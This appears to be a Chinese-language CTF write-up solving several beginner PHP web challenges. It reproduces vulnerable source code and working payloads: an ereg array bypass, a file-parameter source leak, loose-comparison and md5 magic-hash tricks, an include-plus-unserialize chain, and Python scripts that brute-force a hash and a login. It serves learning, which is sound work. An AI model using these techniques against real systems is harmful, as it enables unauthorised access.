ctf入门级题目
<?php
$flag = '*********';
if (isset ($_GET['password'])) {
if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
echo '<p class="alert">You password must be alphanumeric</p>';
else if (strpos ($_GET['password'], '--') !== FALSE)
die($flag);
else
echo '<p class="alert">Invalid password</p>';
}
?>
<section class="login">
<div class="title">
<a href="./index.phps">View Source</a>
</div>
<form method="POST">
<input type="text" required name="password" placeholder="Password" /><br/>
<input type="submit"/>
</form>
</section>
</body>
</html>
利用ereg和strops处理数组的漏洞,提交?password[]=1
flag{Maybe_using_rexpexp_wasnt_a_clever_move}
曲奇饼
观察链接,file后面是一个base64,解码为key.txt并没有什么用。将index.phpbase64,然后不断修改line读取源码。
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['file'])?$_GET['file']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&file=a2V5LnR4dA==");
$file_list = array(
'0' =>'key.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['key']) && $_COOKIE['key']=='li_lr_480'){
$file_list[2]='thisis_flag.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>
view-source:http://ctf1.shiyanbar.com/shian-quqi/index.php?line=&file=dGhpc2lzX2ZsYWcucGhw
flag{UHGgd3rfH*(3HFhuiEIWF}
类型
<?php
show_source(__FILE__);
$a=0;
$b=0;
$c=0;
$d=0;
if (isset($_GET['x1']))
{
$x1 = $_GET['x1'];
$x1=="1"?die("ha?"):NULL;
switch ($x1)
{
case 0:
case 1:
$a=1;
break;
}
}
$x2=(array)json_decode(@$_GET['x2']);
if(is_array($x2)){
is_numeric(@$x2["x21"])?die("ha?"):NULL;
if(@$x2["x21"]){
($x2["x21"]>2017)?$b=1:NULL;
}
if(is_array(@$x2["x22"])){
if(count($x2["x22"])!==2 OR !is_array($x2["x22"][0])) die("ha?");
$p = array_search("XIPU", $x2["x22"]);
$p===false?die("ha?"):NULL;
foreach($x2["x22"] as $key=>$val){
$val==="XIPU"?die("ha?"):NULL;
}
$c=1;
}
}
$x3 = $_GET['x3'];
if ($x3 != '15562') {
if (strstr($x3, 'XIPU')) {
if (substr(md5($x3),8,16) == substr(md5('15562'),8,16)) {
$d=1;
}
}
}
if($a && $b && $c && $d){
include "flag.php";
echo $flag;
}
?>
最后:
x1=1a&x2={"x21":"2018a","x22":[[0],0]}&x3=XIPU18570
绕过x3的脚本
import hashlib
for i in xrange(1000000):
s = 'XIPU' + str(i)
mymd5 = hashlib.md5()
mymd5.update(s)
mymd5 = mymd5.hexdigest()
flag = 1
if mymd5[8:10] == '0e':
for j in mymd5[10:24]:
if j.isalpha():
flag = 0
break
if flag == 1:
print s
break
CTF{Php_1s_bstl4_1a}
登录
源码提示:<!-- 听说密码是一个五位数字 -->,那就直接进行爆破好了
import requests
import re
s = requests.Session()
def get_rancode():
response = s.get("http://ctf1.shiyanbar.com/shian-s/index.php")
html = response.text
regex = re.compile('ddd')
code = regex.findall(html)
return code[0]
if __name__ == '__main__':
for password in range(9999, 99999):
code = get_rancode()
url = "http://ctf1.shiyanbar.com/shian-s/index.php?username=admin&password={}&randcode={}".format(
str(password), code)
proxy={"http":"http://127.0.0.1:8080"}
response = s.get(url)
text = response.text
if "flag" in text:
print url
break
脚本哪错了?没跑出来,不懂
admin
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
echo "hello admin!<br>";
include($file); //class.php
}else{
echo "you are not admin ! ";
读取class.php:
<?php
class Read{//f1a9.php
public $file;
public function __toString(){
if(isset($this->file)){
echo file_get_contents($this->file);
}
return "__toString was called!";
}
}
读取index.php:
<?php
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
echo "hello admin!<br>";
if(preg_match("/f1a9/",$file)){
exit();
}else{
include($file); //class.php
$pass = unserialize($pass);
echo $pass;
}
}else{
echo "you are not admin ! ";
}
?>
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
echo "hello admin!<br>";
include($file); //class.php
}else{
echo "you are not admin ! ";
}
再通过序列化读取flag:
哦豁。。第一个也可以用php://input 而不是远程包含绕过
flag_Xd{hSh_ctf:e@syt0g3t}
小记:emm....这种水平的比赛...确实对于某些水平来是浪费时间...感觉自己到了一个瓶颈,难的比赛又不会,一些比较简单的所获甚微。哎....还是要学啊